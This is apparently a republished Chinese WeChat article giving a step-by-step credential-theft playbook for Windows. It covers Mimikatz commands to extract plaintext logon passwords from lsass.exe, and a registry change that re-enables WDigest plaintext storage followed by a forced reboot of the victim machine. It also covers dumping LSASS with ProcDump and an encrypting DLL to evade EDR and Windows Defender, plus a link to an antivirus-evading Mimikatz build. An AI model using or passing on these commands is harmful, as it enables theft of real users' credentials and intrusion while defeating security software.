1►修改注册表绕过LSA保护
Mimikatz原理:Mimikatz通过逆向获取存储在lsass.exe进程中的明文登录密码。(lsass.exe用于本地安全和登陆策略)。首先使用Mimikatz抓取时必须是管理员权限,在win10,win11,win2012等版本中,系统会开启LSA保护,明文密码字段会显示null。
第一步提权:privilege::debug第二步抓取:sekurlsa::logonPasswords
关闭LSA保护:管理员权限对注册表进行修改,随后使用脚本或者任意方法重启系统,使受害机的管理员重新登陆,此次登录的明文密码将会保存在lsass.exe 进程中,使用Mimikatz再次抓取可显示明文密码。若恢复注册表可直接将1改为0。
修改命令:
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
2►Procdump dump绕过AV
绕过思路:由于Mimikatz的强大,各大EDR已经在防护Mimikatz的道路上越走越远,所以我们如果 针对Mimikatz做免杀哪怕过静态,还要考虑各种姿势绕过抓取hash的动作,但是这无疑需要很多的时间,因此我们可以考虑取出已经存储在lsass.exe的明文密码,通过本地的Mimikatz进行处理得到密码。
实施:前提已经关闭LSA保护并且为管理员权限,使用微软项目Procdump进行Dump(由于是微软项目,各EDR都不会报毒), 获取lsass进程储存的密码信息保存为niuma.dmp。
Procdump项目地址:
https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump命令:ProcDump.exe-accepteula-malsass.exeniuma.dmp
将生成的niuma.dmp保存到本地,在本地使用Mimikatz获取明文密码,此时因为已经将信息拉取到本地环境Mimikatz同目录中,所以普通用户权限就可以直接读取niuma.dmp中的明文密码。
第一步:sekurlsa::minidumpniuma.dmp第二步:sekurlsa::logonPasswordsfull
3►DLL文件加密储存绕过AV
原理:由于Windowdefinder 检测逻辑是文件层只要是lsass.exe生成的存储文件就会报毒删除,因此需要在内存存储中通过DLL干扰对存储加密绕过WD。
实施:前提已经关闭LSA保护并且为管理员权限,在运行中可能报错没有指定模块参考,需要查找该DLL文件的依赖项保存到同一目录,使用命令生成加密test.log,保存路径C:/Windows/Tmep,将文件保存到本地,解密test.log获取初始存储信息,随后与二相同mimikatz获取明文密码。
第一步生成加密文件:rundll32 DumpHash.dll dllmain
第二步本地解密命令:mimikatz 解密.exe test.log 1.bin
第三步读取明文:sekurlsa::minidump 1.bin sekurlsa::logonPasswords full(与二相同不再截图)
文章来源:https://boke.vpss.cc
4►免杀Mimikatz获取
https://github.com/xjsafe/MimikatzBypass
原文始发于微信公众号(李白你好):Mimikatz的使用及免杀方向(过360,火绒和WindowsDefinder)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论